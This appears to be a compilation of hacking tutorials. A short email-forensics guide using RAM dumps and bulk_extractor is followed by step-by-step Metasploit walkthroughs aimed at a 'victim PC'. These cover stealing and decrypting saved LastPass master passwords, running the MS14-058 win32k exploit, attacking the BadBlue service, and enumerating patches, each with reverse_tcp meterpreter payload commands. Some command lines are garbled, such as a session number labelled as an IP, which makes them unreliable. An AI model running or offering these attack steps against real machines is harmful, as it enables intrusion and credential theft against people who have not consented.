How to Collect Email Evidence in Victim PC (Email Forensics)

First capture the victim’s ram using dump it tool. (For details visit here)

Download bulk extractor viewer (from here) and install it in your PC.


Now open bulk extractor viewer and click on to generate report


Now select the dump it image file and select an output folder for the report and click on start bulk extractor as seen below


Now in order to investigate the victim saved information of Email ID Click on email.txt as seen below


And also click on email_histogram.txt

Hack Saved LastPass Master Password in Remote Windows, Linux, MAC PC

This module extracts and decrypts LastPass master login accounts and passwords

Exploit Targets
lastpass

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use post/multi/gather/lastpass_creds
msf exploit (lastpass_creds)>set payload windows/meterpreter/reverse_tcp
msf exploit (lastpass_creds)>set lhost 192.168.1.103 (IP of Local Host)
msf exploit (lastpass_creds)>set session 1 (IP of Local Host)
msf exploit (lastpass_creds)>exploit

Hack Remote Windows PC using Windows Track Popup Menu Win32k NULL Pointer Dereference

This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSend MessageTimeout to achieve arbitrary code execution. This module has been tested successfully on Windows XP SP3, Windows 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows 2008 R2 SP1 64 bits.

Exploit Targets
Windows 7

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/windows/local/ms14_058_track_popup_menu
msf exploit (ms14_058_track_popup_menu)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms14_058_track_popup_menu)>set lhost 192.168.0.111 (IP of Local Host)
msf exploit (ms14_058_track_popup_menu)>set session 1 (IP of Local Host)
msf exploit (ms14_058_track_popup_menu)>exploit

Hack Remote Windows PC using BadBlue Exploit

BadBlue is software which can use for photos, videos, music, and business files with friends and colleagues instantly.


First scan badblue service the victim pc using nmap –sV 192.168.1.2


Open Kali terminal type msfconsole


Now type use exploit/windows/http/badblue_passthru
msf exploit (badblue_passthru)>set rhost 192.168.1.2 (Victim IP)
msf exploit (badblue_passthru)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (badblue_passthru)>exploit  

How to Gather Applied Patches in Remote Windows PC

This module will attempt to enumerate which patches are applied to a windows system based on the result of the WMI query: SELECT HotFixID FROM Win32_QuickFixEngineering

Exploit Targets
Windows 7

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/windows/gather/enum_patches
msf exploit (enum_patches)>set payload windows/meterpreter/reverse_tcp
msf exploit (enum_patches)>set lhost 192.168.1.6 (IP of Local Host)
msf exploit (enum_patches)>set session 1
msf exploit (enum_patches)>exploit